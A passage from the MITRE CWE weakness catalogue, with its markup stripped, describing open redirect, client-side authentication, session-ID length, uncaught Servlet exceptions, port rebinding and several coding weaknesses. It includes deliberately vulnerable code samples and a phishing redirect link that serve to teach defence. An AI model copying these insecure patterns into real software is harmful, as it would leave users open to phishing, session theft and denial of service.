guessed. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is greater than 292 years. - - - - - The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length. - - <sun-web-app> - ...<session-config> - <session-properties><property name="idLengthBytes" value="8"><description>The number of bytes in this web module's session ID.</description></property></session-properties> - </session-config>... - </sun-web-app> - - This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user's session. - Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits. - - - - - J2EE Misconfiguration: Insufficient Session-ID Length - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Background_Details, Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Other_Notes, References - - - CWE Content Team - MITRE - 2009-10-29 - updated Background_Details, Common_Consequences, Enabling_Factors_for_Exploitation, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The Servlet does not catch all exceptions, which may reveal sensitive debugging information. - When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. For example, a stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components. - - - - - - - - Missing Catch Block - - - - - Implementation - - - - - Confidentiality - Availability - Read Application Data - DoS: Crash, Exit, or Restart - - - - - Implementation - Implement Exception blocks to handle all types of Exceptions. - - - - - The following example attempts to resolve a hostname. - - protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} - - A DNS lookup failure will cause the Servlet to throw an exception. - - - - - ERR01-J - Do not allow exceptions to expose sensitive information - - - SFP4 - Unchecked Status Condition - - - - The "Missing Catch Block" concept is probably broader than just Servlets, but the broader concept is not sufficiently covered in CWE. - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Alternate_Terms, Description, Maintenance_Notes, Name, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Missing Catch Block - Failure to Catch All Exceptions (Missing Catch Block) - Failure to Catch All Exceptions in Servlet - - - - A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. - An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. - - - - - - - - - - Phishing is a general term for deceptive attempts to coerce private information from users that will be used for identity theft. - - - - Open Redirect - - - Cross-site Redirect - - - Cross-domain Redirect - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Low - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data. - - - Access Control - Confidentiality - Other - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Other - The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site. - - - - - Manual Static Analysis - Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. - High - - - Automated Dynamic Analysis - Automated black box tools that supply URLs to every input may be able to spot Location header modifications, but test case coverage is a factor, and custom redirects may not be detected. - - - Automated Static Analysis - Automated static analysis tools may not be able to determine whether input influences the beginning of a URL, which is important for reducing false positives. - - - Other - Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fuzz Tester - Framework-based Fuzzer - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - Use a list of approved URLs or domains to be used for redirection. - - - - Architecture and Design - Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. - - - Architecture and Design - Enforcement by Conversion - - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability. - - - - Architecture and Design - Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330). - Note that this can be bypassed using XSS (CWE-79). - - - Architecture and Design - Implementation - Attack Surface Reduction - - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields. - - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - - - The following code obtains a URL from the query string and then redirects the user to that URL. - - $redirect_url = $_GET['url'];header("Location: " . $redirect_url); - - The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link: - - http://example.com/example.php?url=http://malicious.example.com - - The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place. - - - The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address. - - public class RedirectServlet extends HttpServlet { - - protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {String query = request.getQueryString();if (query.contains("url")) {String url = request.getParameter("url");response.sendRedirect(url);}} - } - - The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of a e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link: - - <a href="http://bank.example.com/redirect?url=http://attacker.example.net">Click here to log in</a> - - The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker's web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker's web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site. - - - - - CVE-2005-4206 - URL parameter loads the URL into a frame and causes it to appear to be part of a valid page. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4206 - - - CVE-2008-2951 - An open redirect vulnerability in the search script in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL as a parameter to the proper function. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 - - - CVE-2008-2052 - Open redirect vulnerability in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the proper parameter. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2052 - - - - - 38 - URl Redirector Abuse - - - SFP24 - Tainted input to command - - - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Background_Details, Description, Detection_Factors, Likelihood_of_Exploit, Name, Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-03 - updated References and Observed_Examples - - - CWE Content Team - MITRE - 2008-10-14 - updated Alternate_Terms, Observed_Examples, References - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Common_Consequences, Detection_Factors, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Unsafe URL Redirection - URL Redirection to Untrusted Site - URL Redirection to Untrusted Site (aka 'Open Redirect') - - - - The software is composed of a server that relies on the client to implement a mechanism that is intended to protect the server. - When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect. - - - - - - - - - - Primary - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Architecture and Design - Consider a product that consists of two or more processes or nodes that must interact closely, such as a client/server model. If the product uses protection schemes in the client in order to defend from attacks against the server, and the server does not use the same schemes, then an attacker could modify the client in a way that bypasses those schemes. This is a fundamental design flaw that is primary to many weaknesses. - - - Medium - - - Access Control - Availability - Bypass Protection Mechanism - DoS: Crash, Exit, or Restart - Client-side validation checks can be easily bypassed, allowing malformed or unexpected input to pass into the application, potentially as trusted data. This may lead to unexpected states, behaviors and possibly a resulting crash. - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Client-side checks for authentication can be easily bypassed, allowing clients to escalate their access levels and perform unintended actions. - - - - - Architecture and Design - - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. - - - - Architecture and Design - If some degree of trust is required between the two entities, then use integrity checking and strong authentication to ensure that the inputs are coming from a trusted source. Design the product so that this trust is managed in a centralized fashion, especially if there are complex or numerous communication channels, in order to reduce the risks that the implementer will mistakenly omit a check in a single code path. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Testing - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step. - CLIENT-SIDE (client.pl) - - $server = "server.example.com";$username = AskForUserName();$password = AskForPassword();$address = AskForAddress();$sock = OpenSocket($server, 1234);writeSocket($sock, "AUTH $username $password\n");$resp = readSocket($sock);if ($resp eq "success") { - - - # username/pass is valid, go ahead and update the info! - writeSocket($sock, "CHANGE-ADDRESS $username $address\n"; - }else {print "ERROR: Invalid Authentication!\n";} - - SERVER-SIDE (server.pl): - - $sock = acceptSocket(1234);($cmd, $args) = ParseClientRequest($sock);if ($cmd eq "AUTH") { - ($username, $pass) = split(/\s+/, $args, 2);$result = AuthenticateUser($username, $pass);writeSocket($sock, "$result\n"); - # does not close the socket on failure; assumes the - - - # user will try again - - - }elsif ($cmd eq "CHANGE-ADDRESS") {if (validateAddress($args)) {$res = UpdateDatabaseRecord($username, "address", $args);writeSocket($sock, "SUCCESS\n");}else {writeSocket($sock, "FAILURE -- address is malformed\n");}} - - The server accepts 2 commands, "AUTH" which authenticates the user, and "CHANGE-ADDRESS" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the "AUTH" command and simply executing the CHANGE-ADDRESS. - - - - - CVE-2006-6994 - ASP program allows upload of .asp files by bypassing client-side checks. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994 - - - CVE-2007-0163 - steganography products embed password information in the carrier file, which can be extracted from a modified client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0163 - - - CVE-2007-0164 - steganography products embed password information in the carrier file, which can be extracted from a modified client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0164 - - - CVE-2007-0100 - client allows server to modify client's configuration and overwrite arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0100 - - - - - A1 - Unvalidated Input - CWE More Specific - - - - - - - - - - - - - - - - - - - - - Server-side enforcement of client-side security is conceptually likely to occur, but some architectures might have these strong dependencies as part of legitimate behavior, such as thin clients. - - - - CWE Community - 2007-05-07 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Applicable_Platforms, Common_Consequences, Description - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Client-Side Enforcement of Server-Side Security - Design Principle Violation: Client-Side Enforcement of Server-Side Security - - - - A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check. - Client-side authentication is extremely weak and may be breached easily. Any attacker may read the source code and reverse-engineer the authentication mechanism to access parts of the application which would otherwise be protected. - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - - - - - Architecture and Design - Do not rely on client side data. Always perform server side authentication. - - - - - CVE-2006-0230 - Client-side check for a password allows access to a server using crafted XML requests from a modified client. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230 - - - - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Maintenance_Notes, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Relationships - - Client-Side Authentication - - - - When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed. - On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its UDP packets/TCP connection. - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Packets from a variety of network services may be stolen or the services spoofed. - - - - - Policy - Restrict server socket address to known local addresses. - - - - - This code binds a server socket to port 21, allowing the server to listen for traffic on that port. - - void bind_socket(void) { - - int server_sockfd;int server_len;struct sockaddr_in server_address; - - /*unlink the socket if already bound to avoid an error when bind() is called*/ - - unlink("server_socket");server_sockfd = socket(AF_INET, SOCK_STREAM, 0); - server_address.sin_family = AF_INET;server_address.sin_port = 21;server_address.sin_addr.s_addr = htonl(INADDR_ANY);server_len = sizeof(struct sockaddr_in); - bind(server_sockfd, (struct sockaddr *) &s1, server_len); - } - - This code may result in two servers binding a socket to same port, thus receiving each other's traffic. This could be used by an attacker to steal packets meant for another process, such as a secure FTP server. - - - - - SFP32 - Multiple binds to the same port - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Enabling_Factors_for_Exploitation, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - Multiple Binds to Same Port - - - - The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping. - - - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (CPU) - - - - - Implementation - Do not use user-controlled data for loop conditions. - - - Implementation - Perform input validation. - - - - - The following example demonstrates the weakness. - - void iterate(int n){int i;for (i = 0; i < n; i++){foo();}}void iterateFoo(){unsigned int num;scanf("%u",&num);iterate(num);} - - - - In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. - - int processMessageFromSocket(int socket) { - int success; - char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; - - // get message from socket and store into buffer - - - //Ignoring possibliity that buffer > BUFFER_SIZE - if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { - - - // place contents of the buffer into message structure - ExMessage *msg = recastBuffer(buffer); - - // copy message body into string for processing - int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; - - // process message - success = processMessage(message); - }return success; - } - - However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). - - - - - SFP25 - Tainted input to variable - - - ASCSM-CWE-606 - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package. - - - - - - - - - Implementation - - - - - Integrity - Modify Application Data - - - - - Implementation - Protect mutable objects by making them private. Restrict access to the getter and setter as well. - - - - - Here, an array (which is inherently mutable) is labeled public static final. - - public static final String[] USER_ROLES; - - - - - - SFP23 - Exposed Data - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter. - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Confidentiality - Modify Application Data - Read Application Data - - - - - Implementation - Make all fields private. Use getter to get the value of the field. Setter should be used only by the framework; setting an action form field from other actions is bad practice and should be avoided. - - - - - In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for a online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // variables for registration formpublic String name;public String email;... - public RegistrationForm() {super();}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}... - } - - However, within the RegistrationForm the member variables for the registration form input data are declared public not private. All member variables within a Struts framework ActionForm class must be declared private to prevent the member variables from being modified without using the getter and setter methods. The following example shows the member variables being declared private and getter and setter methods declared for accessing the member variables. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // private variables for registration formprivate String name;private String email;... - public RegistrationForm() {super();} - public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} - - - - // getter and setter methods for private variables...} - - - - - - SFP28 - Unexpected access points - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient. - Double-checked locking refers to the situation where a programmer checks to see if a resource has been initialized, grabs a lock, checks again to see if the resource has been initialized, and then performs the initialization if it has not occurred yet. This should not be done, as is not guaranteed to work in all languages and on all architectures. In summary, other threads may not be operating inside the synchronous block and are not guaranteed to see the operations execute in the same order as they would appear inside the synchronous block. - - - 